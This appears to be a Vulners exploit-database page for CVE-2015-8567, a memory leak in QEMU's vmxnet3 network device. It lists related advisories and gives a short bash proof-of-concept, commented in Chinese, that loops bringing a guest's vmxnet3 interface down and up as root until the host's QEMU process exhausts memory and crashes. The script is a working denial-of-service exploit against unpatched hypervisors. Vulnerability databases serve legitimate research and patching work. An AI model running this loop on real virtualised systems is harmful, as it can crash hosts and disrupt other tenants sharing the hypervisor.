Vulners
Lucene search
qemu内存泄露漏洞(CVE-2015-8567)
| Reporter | Title | Published | Views | Family All 82 |
|---|---|---|---|---|
 | QEMU 'net/vmxnet3.c' denial of service vulnerability (CNVD-2016-00106) | 7 Jan 201600:00 | – | cnvd |
 | CVE-2015-8567 | 13 Apr 201717:00 | – | cve |
 | CVE-2015-8567 | 13 Apr 201717:00 | – | cvelist |
 | [SECURITY] [DSA 3471-1] qemu security update | 8 Feb 201619:45 | – | debian |
| [SECURITY] [DSA 3471-1] qemu security update | 8 Feb 201619:45 | – | debian |
 | CVE-2015-8567 | 13 Apr 201717:00 | – | debiancve |
 | Debian DSA-3471-1 : qemu - security update | 9 Feb 201600:00 | – | nessus |
| EulerOS 2.0 SP2 : qemu-kvm (EulerOS-SA-2019-2431) | 4 Dec 201900:00 | – | nessus |
| EulerOS 2.0 SP3 : qemu-kvm (EulerOS-SA-2020-1430) | 15 Apr 202000:00 | – | nessus |
| Fedora 22 : qemu-2.3.1-11.fc22 (2016-275e9ff483) | 4 Mar 201600:00 | – | nessus |
10
#!/bin/bash
#这可能是最简单的exp吧...
#原理很简单,根据详情分析,发现重新启动网卡就会调用vmxnet3_activate_device
#然后堆就不停的分配内存
#直到进程漰溃
#这是一段bash shell脚本
#eth1是我这里虚拟机上的vmxnet3设备
#从开始运行直到漰溃用了我一個午觉时间,大概40分钟
#其实具体情况按照自己本机机器来定,时间长短不一
#root权限执行
while true
do
ifconfig eth1 down && echo 'Down!'
ifconfig eth1 up && echo 'Up!'
done
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jan 2016 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.05557